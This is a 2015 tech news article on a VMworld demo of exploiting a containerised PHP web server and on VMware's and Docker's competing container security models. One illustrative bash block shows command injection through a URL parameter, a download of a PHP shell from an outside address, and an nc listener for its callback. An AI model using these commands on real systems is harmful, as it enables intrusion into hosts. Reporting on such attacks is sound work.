Networking

VMware’s Appenzeller: Hypervisors Close the Container Security Gap

16 Sep 2015 4:43pm

There is an open channel between a container and the Linux host on which it runs. In a live demonstration at VMworld on September 1, VMware Chief Technology Strategy Officer Guido Appenzeller and network engineer Scott Lowe showed how that link can be exploited maliciously.

Their objective was to demonstrate why hypervisors such as ESX and network virtualization layers such as NSX should not be flushed out of the enterprise, even as enterprises adopt containers into their data centers. VMware’s entire value proposition rests on the hypervisor being the only secure foundation. If customers no longer see this as the case, VMware is in trouble.

Re-containment

When a container runs a web server, it is typically also capable of running a live PHP interpreter. Lowe showed how, when a script’s final command is not properly escaped, he could concatenate chains of arbitrary commands onto the tail end of what should have been an ordinary URL. Among the commands Lowe could run was one that downloads a PHP shell from any given IP address, without verification, and executes it in a separate container (assuming the privilege levels of the container’s Linux host permit it, and with a container running a web server, they very well might).

Lowe could then use another terminal instance to spin up a listener for the new container’s shell. From that terminal, a simple URL call executed the shell, which could then be used remotely as a snoop into the Linux system hosting all the containers.
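The demo’s exact commands weren’t shown; what follows is a minimal sketch of this class of attack, with every hostname, address, path and port invented for illustration:

```bash
# Hypothetical reconstruction of the attack class, not the VMworld demo's
# actual commands; the hostnames, the address 203.0.113.5, the paths and
# the port are all invented.

# 1. Append a shell command to a query parameter the PHP script fails to
#    escape; the web server runs it with the container's privileges:
curl "http://victim.example.com/report.php?file=today.log%3Bcurl+-o+/tmp/shell.php+http://203.0.113.5/shell.php"

# 2. In a second terminal, listen for the planted shell's callback:
nc -l -p 4444

# 3. A second URL call launches the downloaded shell, which connects back
#    to the listener and can snoop on the host from there:
curl "http://victim.example.com/report.php?file=x%3Bphp+/tmp/shell.php+203.0.113.5+4444"
```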

“As long as there are humans developing code, they will introduce vulnerabilities,” explained Appenzeller, as a way of avoiding blaming Docker — a company with which VMware is ostensibly partnering — and distributing responsibility to the species as a whole.

Appenzeller and Lowe’s demonstration showed how VMware is addressing CIOs with the message that it is premature to consider containerization as part of a migration strategy that eventually leaves the world of conventional VMs behind. In VMware’s view, it is best that containers be absorbed into existing systems, up to the point where they make contact with the infrastructure.

September 2015 model of VMware microsegmentation, from VMworld

“One of the big differences between containers and virtual machines is that, for containers, they can often share the base operating system,” Appenzeller explained. “I have kernel-level separation between the containers, and they are all using the same operating system. If I’m a CIO, that makes my life a lot easier, because patching, now, has just become a lot easier. I don’t need to patch in five different places anymore; I can do this in one place, and it’s much less effort.”

Appenzeller went on to say VMware has many customers — among them, eBay — that run containers in production on NSX and ESX, even though Docker’s aim from the beginning has been to substitute for hypervisors. And he admitted his first response to this revelation was, “Clearly these guys are doing it wrong. The whole point of containers is not to use hypervisors, but to do this directly on the host.

“It turns out, this actually makes sense, and I think this is the right model for container deployment in the enterprise,” he added.

One Way or the Other

The Appenzeller model for container/VM hybridization, as history may one day refer to it, is not the only model VMware is advancing as an alternative to an all-container universe — not even the only one being shown at the same conference.

Microsegmentation is VMware’s original hybrid deployment model for containers, first described some months back by Appenzeller. Sometimes hyphenated and sometimes not, the term describes one of the services introduced by the NSX network layer: the partitioning of virtualized environments into their own sandboxes.

In a typical vSphere environment, containers become segmented (VMware’s concept of an extra layer of isolation) by virtue of being hosted within individual VMs. That virtue was praised during the presentation by Suneet Nandwani, eBay’s senior director for cloud engineering.

First, Nandwani told the audience that the chief attraction of containers for eBay was the ability to orchestrate applications using Kubernetes. He also said that eBay was a charter NSX customer. Although no one stated this outright on stage, one can draw the conclusion that eBay is using NSX microsegmentation to produce sandboxes, of a sort, that can be orchestrated with Kubernetes. Nandwani did not say whether eBay had to use multiple instances of Kubernetes (which would cut against the whole point of orchestration), though one would hope it uses a single orchestrator.

However orchestration works, Nandwani explained, eBay uses NSX to create a private network for all endpoints claimed by containers, thus confining the scope of an otherwise unmanageable storm of IP addresses to a manageable chunk. Conceivably, eBay might have used Weave’s private networking scheme instead, deploying its containers on bare metal, or in a cloud (perhaps even a federated cloud cluster), without VMs.
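Nandwani didn’t share eBay’s NSX configuration, but as a rough analogue, the same confinement can be sketched with Docker’s own bridge networking (the network name and subnet here are invented):

```bash
# A rough analogue using Docker's bridge networking rather than NSX
# (the network name and subnet are invented for illustration):
docker network create --driver bridge --subnet 10.200.0.0/16 private-net

# Containers attached to private-net draw their addresses only from that
# block and, by default, can reach only peers on the same network:
docker run -d --net private-net --name web-1 nginx
docker run -d --net private-net --name web-2 nginx
```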


Elsewhere at VMworld that same week, VMware introduced two new and different container deployment models, both of which could be considered alternatives to the eBay model — alternatives that bring more VMware technology into the mix.

“Model 2,” I’ll call it, is the vSphere Integrated Containers model. Here, each individual container is wrapped within a thin VM shell (like an M&M), giving it just enough of a VM’s structure to be treated like one by NSX and the vSphere management layer. These re-wrapped containers are then hosted by an amended vSphere infrastructure, which plays the role of the Linux operating system. The container “thinks” it’s being hosted by Linux, when it’s not.

“VSphere Integrated Containers takes one of the most fundamental and valuable precepts of virtualization and applies it to containers,” wrote VMware senior engineer Ben Corrie on August 31. “I like to call it ‘exploding the Linux container host.’”

Corrie draws a fantastic picture of a dynamic environment whose containers may be hosted by any part of vSphere that happens to be hosting a cluster, whatever its size. It’s a picture that resembles babysitting more than hosting, passing off the babies to whatever reliable adults happen to be free at the moment.

“Model 3” was introduced literally within minutes of “Model 2.” In this third and most radical alternative, VMware’s Photon Platform actually does replace existing VM infrastructure with an underlying layer called “Photon Machine,” which incorporates most of the technology of ESX hypervisors, redubbed in this incarnation as “microvisors.” This opens the possibility of a kind of coupling in reverse: encapsulating VMs within containers, so long as they include a mechanism for relying upon the Photon Machine layer as though it were the hypervisor.

VMware’s intention is to work with sister company Pivotal to deliver Photon Platform as a container delivery system for Cloud Foundry — one that customers could end up perceiving as the de facto system for that platform.

VMware co-CTO Kit Colbert distinguished the two new models from one another in a press announcement during VMworld: “With vSphere Integrated Containers, customers can easily extend their existing vSphere environments to run container-based applications alongside their traditional apps. For customers building large SaaS apps or other massively distributed apps and looking at greenfield data center architectures, Photon Platform provides all the benefits of a mature and secure hypervisor core with a scalable, distributed and multi-tenant control plane.”

Both of these new models inject VMware-specific technology into the container mix: a little piece of code somewhere (either the “jeVM” candy coating for Model 2, or Photon OS for Model 3) that could end up “flavorizing” containers in public distribution — something that Docker Inc. has said in the past it does not want.

“Model 1,” as Appenzeller explains it, would not inject more VMware technology into containers. Instead, it depends on enterprises’ willingness to continue relying upon NSX as what he calls a stateful firewall, enclosing containers within a restricted environment and effectively containing the damage caused by a malicious incursion.

Furthermore, the CTSO said, the NSX layer could be leveraged to enforce rules that prevent containers from communicating with one another on designated ports. This sets up an environment that leaves the hypervisor where it’s always been, relying upon it to give containers the security that Docker’s security team claimed they had from the beginning.
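Appenzeller didn’t show NSX’s rule syntax; on a plain Linux container host, a roughly equivalent restriction might look like a single iptables rule (the subnet and port here are invented):

```bash
# A rough analogue using iptables on the container host; NSX enforces the
# same idea in the virtual network layer. The subnet and port are invented.
# Drop container-to-container traffic on TCP 6379 so that, for example,
# one container's Redis instance can't be probed by a compromised neighbor:
iptables -I FORWARD -s 172.17.0.0/16 -d 172.17.0.0/16 -p tcp --dport 6379 -j DROP
```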

In an interview with The New Stack for an upcoming @ Scale podcast in October, Docker Senior Vice President for Product Scott Johnston says that any one of these VM integration models may be necessary for enterprises to be able to utilize containers to any degree.

At DockerCon in June, Docker introduced developers to Notary, its open source system for certifying the validity of the sources of Docker images pushed to public repositories and for verifying the integrity of those images’ contents. In August, the company released its own branded implementation of Notary, called Docker Content Trust.
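On the client side, Docker Content Trust is switched on with a single environment variable; the image name below is merely illustrative:

```bash
# Docker Content Trust shipped as a client-side switch with Docker 1.8;
# the image name here is an invented example:
export DOCKER_CONTENT_TRUST=1

# With trust enabled, a pull succeeds only when the tag carries a valid
# Notary signature, and a push signs the tag as it's uploaded:
docker pull myorg/webapp:1.2
docker push myorg/webapp:1.2
```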

Docker’s aim is to deploy a signing and verification system so reliable on both the sending and receiving ends of the network that the security of the network in between is no longer an issue. Here’s what Docker Security Lead Diogo Mónica said in an interview with The New Stack:

“One thing that we’re gaining is that we do not need to rely on any trusted means of communication for this content to be downloaded and verified securely by the final Docker user. This is essentially a huge guarantee now that we’re providing, that was not being provided before.”

Any Way You Want It

Docker’s stance is to be infrastructure-agnostic and cognizant of the investments organizations have made.

“There are a number of users, particularly in the enterprise IT space, that have made significant investments in their VM plant,” says Johnston.

“They have not just technology, but automation tools that they’ve built internally, perhaps, or purchased from other vendors. They have human capital that is extremely valuable, and has been trained and grown over time, and [they have] the stacks to support that infrastructure. Very importantly, that infrastructure has gone through compliance reviews and security reviews, and has received a number of government approvals, depending on the industry and regulatory environment.

“You look at all of that investment in your infrastructure plant,” he continues, “and as a user, you would ask yourself, ‘Can I reuse this for these new Docker container workloads?’ Of course our answer — because we’re infrastructure-agnostic — is yes, absolutely. If you trust that VM, you trust that compliance review, you trust the processes that you’ve established around your VM infrastructure, outstanding. All we need is a modern Linux kernel, and a standard, modern infrastructure, and we can run these Docker-containerized workloads.”

Johnston stopped short of declaring whether VMware’s vSphere integration scheme would serve as a fair substitute for that modern Linux kernel.

For now, in an effort to hold the ground it’s already won in data centers, VMware is taking the “Oscar Madison approach” to testing models for Docker containerization: throwing everything against the wall to see what sticks.

“I can promise you, it will be awhile before you’re fully containerized,” remarked Appenzeller. “There’s a lot of integration work that needs to be done here.”

Docker, Pivotal, VMware and Weaveworks are sponsors of The New Stack.

Feature image: “segmented faces” by juxtapose^esopatxuj is licensed under CC BY-SA 2.0.
